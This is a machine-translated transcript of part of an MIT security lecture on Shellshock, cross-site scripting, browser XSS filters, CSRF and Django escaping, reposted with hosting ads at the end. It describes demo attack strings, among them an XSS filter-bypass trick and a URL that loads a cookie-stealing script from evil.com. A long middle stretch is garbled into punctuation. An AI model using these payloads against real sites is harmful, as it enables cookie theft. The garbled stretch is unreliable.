MIT course "Computer Systems Security". Lecture 9: "Web Application Security", part 1

Massachusetts Institute of Technology. Lecture course # 6.858. "Security of computer systems". Nikolai Zeldovich, James Mykens. year 2014

Computer Systems Security is a course on the development and implementation of secure computer systems. Lectures cover threat models, attacks that compromise security, and security methods based on the latest scientific work. Topics include operating system (OS) security, capabilities, information flow control, language security, network protocols, hardware protection and security in web applications.

Lecture 1: "Introduction: threat models" Part 1 / Part 2 / Part 3
Lecture 2: "Control of hacker attacks" Part 1 / Part 2 / Part 3
Lecture 3: "Buffer overflow: exploits and protection" Part 1 / Part 2 / Part 3
Lecture 4: "Separation of privileges" Part 1 / Part 2 / Part 3
Lecture 5: "Where Security Errors Come From" Part 1 / Part 2
Lecture 6: "Opportunities" Part 1 / Part 2 / Part 3
Lecture 7: "Sandbox Native Client" Part 1 / Part 2 / Part 3
Lecture 8: "Model of network security" Part 1 / Part 2 / Part 3
Lecture 9: "Web Application Security" Part 1 / Part 2 / Part 3

Let's begin the second lecture of our stunning series of web security stories. I would like to go straight to a quick demonstration of examples, since you know that our demos almost never work. I hope that today you will not see a blank screen.
')
The basic idea is that I would first like to show you an example of a Shellshock error that you may have already heard about. It was quite a popular topic in computer security literature.

People give a Heartbleed error the maximum rating on the hazard scale - 10 out of 10. They believe that this is the most dangerous mistake that the security system should protect against. I thought it would be a great idea to show you a living history of this issue, which you can tell your parents so that they understand that studying at the Massachusetts Institute of Technology is worth the money.

So what is the basic idea of a shellshock error? This is a really great example of why it is so difficult to create secure web applications that span multiple technologies, multiple languages, multiple operating systems, so on and so forth. Therefore, the basic idea is that Shellshock uses the fact that an attacker can create a special http request to the server and control the headers in this request. I wrote a very simple example on the board.
Suppose an attacker wants to send a GET request to some CGI interface on the topic of finding cats, because this is exactly what people are always looking for on the Internet (just kidding). Therefore, there will be a question mark, and some standard host header with a URL, for example, example.com:

GET /querry.cgi? search = cats
Host: example.com
Custom - header: Custom - value

Now note that an attacker can also specify custom headers. For example, I want to find some application-specific header called Custom-header to specify a Custom value there, because the web application can define some functionality that cannot be expressed using simple predefined HTTP headers. So while all this seems pretty harmless.
But ultimately it happens that many of these web servers for processing CGI scripts will actually take these custom values from the Custom - value header and use them to set the Bash environment variables. That is, they will use this Custom-header header to create a custom header for the name of the Bash variable, they will take this Custom value, which the attacker provided, and use it as the value of the Bash variable. Once this variable is set, the CGI server will do some processing of the context of this environment.

And this is bad, because web servers should not take arbitrary values from these random "dirty" things. Thus, in a specific example of the Shellshock error, what happens is that if you add a certain malicious value to the Bash variable, a formal insanity may begin.

Basically, this malicious function definition is chosen in the Bash scripting language, and you should not be bothered by the specifics of this process. But the fact is that if the Bash parameter were set correctly, this part of / bin / id would not be executed. So you just defined some kind of stupid function that does nothing and stops the request execution process.

However, this sequence of characters confuses the Bash parser; it seems to stumble over this nonsense after the slash. And then he says, “oh, I could continue to analyze and execute some commands here, aren't you?”. And in this case, it simply executes the bin / id command, which displays some information about the user. But the essence of the vulnerability is that instead of bin / id you can put absolutely any code here!

I will give a very simple example that you will see on the screen. This is a very simple Python server, the easiest one you can imagine. I use the GET method here. This method means iterating through all HTTP headers in the request.

Here in the header we have a value for the variable K and a value for the query V. In this case, GET simply prints the headers it finds.

And then he is going to do something very stupid - to make a system call and set the value of the shell directly to the value specified in the header. So this is the whole root of vulnerability.

If I go to the next tab and start the victim's web server, then we see that he is ready to accept requests.

Then I can write my special Shellshock client - it is located on the next tab.

In fact, this is quite simple - I simply define one of these malicious lines, attack.str, so it has such “curves” values first. And then I just know that on the server side everything will now be executed according to my will.

In this case, I used something harmless - echo "I own your car." But there could be anything. You can run another Bash shell with the "echo ATTACKER CMD" parameter, that is, a real attacker command, which can be very dangerous.

So, I set the headers and user request, and then just use Python to create an HTTP connection and just send it to the server. So what happens in the end? I am running here my client Shellshock.

You see that a 404 error appeared here, because it does not matter which file I requested, I just insert some kind of index here, non-existent HTML. But if you look here, on the second tab, where we show the victim's web server, which agreed to the connection via port 8282, we will see that it received my messages “I own your car” and ATTACKER CMD.

Because as soon as the victim's server received this header, he immediately set the values for the Bash variable, and as a result, the ATTACKER CMD command was launched. It's clear?

Audience: so it happens if the program starts with this title?

Professor: yes. Thus, the specifics of how an attack works depends on how your web server looks, for example, whether you work with Apache or not. This example is a bit contrived, since I actually created another Bash shell, set a shell variable, and only after that I started the process. But you can imagine that if you created other processes for each incoming connection, you could set the environment variable directly.

Audience: in this way, if you return to the web server code, it would seem that there is a much worse vulnerability than Shellshock. Because you can make a system call and execute a command just by setting a custom header to something else, and I would not have to use the Shellshock error in this example.

Professor: yes, that's right, in this particular web server, which I wrote just for an example, there is a thing that cannot be trusted for anything. But if we did not have Python, but Apache, we could directly set the value of the environment for any particular service using the set nth parameter. But there are servers such as this one that create a separate process and do something very similar to the example given.

Another example I wanted to give you is an example of cross-site scripting. The Shellshock error was a kind of example of how important content disinfection is. We discussed the fact that you should not just accept input from random people and use it directly in commands of any type.

Crossite scripting is another example that shows why something can go wrong. In this example, I have another simple CGI server written in Python.

This is the handle that is executed when a request is received from a client. I typed here some headlines for the answer, and my answer will be plain-text HTML. As it turns out, browsers have some security mechanisms to try to prevent the attack, which I'm going to show you. Therefore, I did so in order to disable some of the protection mechanisms by placing this header line at the beginning.

The CGI script then accesses all the CGI fields and queries, starting with the line form = cgi.FieldStorage (). Imagine that everything that is located in the line after this question mark is the title and parameters of our example:

GET /querry.cgi? search = cats
Host: example.com
Custom - header: Custom - value

Next, the cgi script does a very simple thing - it immediately prints the value of something that came from the attacker. This is the same basic idea, and this is a bad idea, because this print function prints the resulting value directly into the HTML itself.

The following can happen here. Suppose I have a bunch of requests that I want to run. In this first request, I simply set the message value to Hello, that is, I go to the address of the first line.

Therefore, if I go to my page, I will see the word hello on it, because the server accepts directly what I am giving to it and prints “hello”. So no surprises.

I understand that I can really send an arbitrary HTML code there, and if I set the h1 header format, that is, if I send the second line ending in hello to the server, it will change on the page - see, the word style has changed to the h1 header style. So it works, I type the values directly into the page.

Great, now we're in, and that's cool. Now let's just add the JavaScript code, that is, run the third string I prepared in the browser, where a script is inserted that runs after the alert parameter ("XSS").

So now we see a blank screen. It seems that we did not succeed, because no output is visible, and I did not notice any warnings.

But if I look at the output of the web server, I will see that the web server itself has not really received this final script tag. It seems that the browser itself somehow found something evil, although I tried to disable the XSS filter. So it is quite interesting. Later we will take a closer look at this protection mechanism, but for now I’ll note that the browser is trying to resist a cross-site scripting attack.

But you can take advantage of the fact that HTML, CSS and JavaScript are extremely complex languages, and they are written in a difficult to understand way. I will use this and use the last, fourth line of my record, placing it in the address bar of the browser. This is an attacking string containing an invalid URL. It includes the URL of the image <IMG “” ”> and the script tag”> and in fact cannot be parsed. Therefore, upon receiving such a string, the browser will simply get confused and display the information: “The page at 127.0.0.1:8282 says: XSS”. Thus, integrated cross-site scripting does not actually work.

If we click the “OK” button, we will just have a blank page. But if you look at its contents, we will see incomprehensible quotes and brackets, which came from no where.

However, from the point of view of the attacker, the corrupted page does not matter, because we saw a warning, which means that the code was running. And it could be used to steal cookies or do something similar.

Audience: what is the cross-site aspect?

Professor: The cross-site aspect is that if an attacker can convince a user to go to a URL, such as in this example, then he is the person who determines the content of the message. It is he who creates the XSS warning or something. In essence, what happens is that the victim's page executes the code on behalf of someone who does not manage this page.

So, I showed you two quick demonstrations of the "dirty" world in which we live. So why is crossite scripting so common? Why are these issues so important? The reason is that websites are becoming more and more dynamic, and they want to host multiple user content or include content from other domains. Think, for example, about the comment section of a news article, these comments come from unreliable people - from users. One way or another, these sites need to figure out what the rules are for the combination of such things.

Websites may contain custom documents, such as Google or Office 365 documents. All of these documents come from unreliable people, but somehow they must get along with each other and with a large Google or Microsoft infrastructure.

What types of cross-site security scripts can we use? One type of such protection is the cross-site scripting filters in the browser itself. These filters will try to detect possible attacks using cross-site scripts. And we saw one of these filters in action - this was the third example of the scenario that we reviewed.
Suppose you have the URL foo.com/?q= <script src = “evil.com/cookie stealer.js”>. That is, this address runs a script that redirects the user to a malicious site and steals cookies from him.

So, the browser refuses to execute it, and this technique of the attacker will not work. The reason is simple - the browser simply checked whether the embedded <script> in this URL and, upon detecting it, has banned following this link. Thus, this is a very simple heuristic for finding out if something harmful is happening, because no normal developer will put such things in the address. You can configure browser configuration options to turn things on and off. Sometimes this is useful for testing if you just want to quickly enter some JavaScript data without special verification. But usually such a check in the browser is enabled by default.

For example, Chrome and IE have a built-in filter that looks at the value of the URL in the address bar and searches for such things. And if they are there, the browser may try to remove them completely or make the source inside <> empty. There are many methods of heuristic analysis, based on which browsers should determine such things. And if you look at the OWASP site, then there are collected examples of using such heuristics for detecting cross-site scripts and examples of how to bypass this filter.

You know, it was very funny, because at first I did something like this as an example for our lecture, and it did not work. Then I looked into the OWASP cheat sheet and found the fourth option that worked, it was an example with a broken parsing of the address of the image img.

So, the main problem, which does not allow simply to rely on the browser's built-in filters, is that there are many different ways to force CSS and HTML parsers to parse some content in the wrong way. So the built-in solutions are not perfect, they do not cover all vulnerabilities.

Audience: But after all, checking such things is not the responsibility of the browser?

Professor: I mean the case when the browser is on a proxy server, and the proxy does something shown in this example. That is, the built-in filters make sense, because there can be many parsers inside the browser, and these filters are used to protect the handler layers inside the browser.

Audience: I think you can say that it is the responsibility of the web developer, and not the user, to check such things.

Professor: in a certain sense, we could say that in Unix or Windows, there are also processes that the software developer should take care of, and not the user, and the developer must make sure that these things remain isolated. But in fact, the OS and the hardware also plays an important role, because otherwise it would not be possible to trust any programs made by random developers. But basically you are right. In fact, frameworks such as Django or something similar are trying to help you get around some of these problems.

However, filters are not the ideal solution and cannot prevent what is known as persistent, or persistent, cross-site, persistent XSS script attacks. This is a kind of reflection, because the script code simply “lives” in the URL. As soon as the user closed this URL, the attack ended.

But imagine that a user has placed malicious HTML code in the comments section of your site. If the server recognizes this comment as valid and accepts it, then this comment with the malicious payload will live there forever. And when any user visits a page with this comment, they will be exposed to this malicious content.

Another example, funny and sad at the same time, is dating sites. Some dating sites actually allow users to post full HTML content on their profile.

So what does this mean? When someone is lonely, he seeks to find a soul mate and comes to your site. It is about to launch the HTML you created in the context of your session, and this can have very destructive consequences. So the built-in filters do not protect against such things.

Audience: So in the comments section, the attacker probably places a message in which the information goes to the server in a message variable or something?

Professor: there are many different ways you can imagine. So you can imagine that this will be a post. , , XML HTTP .

: , , …

: , , . , . - , .

, , .

, « HTTP », HTTP-only cookie. , , JavaScript cookie. , , , : «, , JavaScript, cookie»! - .

, , . , . , JavaScript cookie, - , , URL- - , , buy.com. , , , Ferrari, attacker, .

, JavaScript, cookie, , URL-. , CSRF , .

, , , . , , . , - , , , Google, Office 365 . . , Google googleusercontent.com. , Gmail . -, 25- .

? , - , google.com. , google.com. .

, – . , -, , . , . — Django. -, , -.

Django , , . – . CSS , . , . Django , : , .

-. , Django, Django : «, -, , , CGI». Django , , . - CGI0, , .

However, Django does much better - it disinfects user content, as it expects a trick from it. It just immediately places the value of the name variable here, and encodes it in such a way that this content can never go out of the HTML context and execute JavaScript code or something like that.

26:25 min

MIT course "Computer Systems Security". Lecture 9: "Web Application Security", part 2

Full version of the course is available here .

Thank you for staying with us. Do you like our articles? Want to see more interesting materials? Support us by placing an order or recommending to friends, 30% discount for Habr users on a unique analogue of the entry-level servers that we invented for you: The whole truth about VPS (KVM) E5-2650 v4 (6 Cores) 10GB DDR4 240GB SSD 1Gbps from $ 20 or how to share the server? (Options are available with RAID1 and RAID10, up to 24 cores and up to 40GB DDR4).

VPS (KVM) E5-2650 v4 (6 Cores) 10GB DDR4 240GB SSD 1Gbps until December for free if you pay for a period of six months, you can order here .

Dell R730xd 2 times cheaper? Only we have 2 x Intel Dodeca-Core Xeon E5-2650v4 128GB DDR4 6x480GB SSD 1Gbps 100 TV from $ 249 in the Netherlands and the USA! Read about How to build an infrastructure building. class c using servers Dell R730xd E5-2650 v4 worth 9000 euros for a penny?

Source: https://habr.com/ru/post/424289/

All Articles

MIT course "Computer Systems Security". Lecture 9: "Web Application Security", part 1

Massachusetts Institute of Technology. Lecture course # 6.858. "Security of computer systems". Nikolai Zeldovich, James Mykens. year 2014

More articles: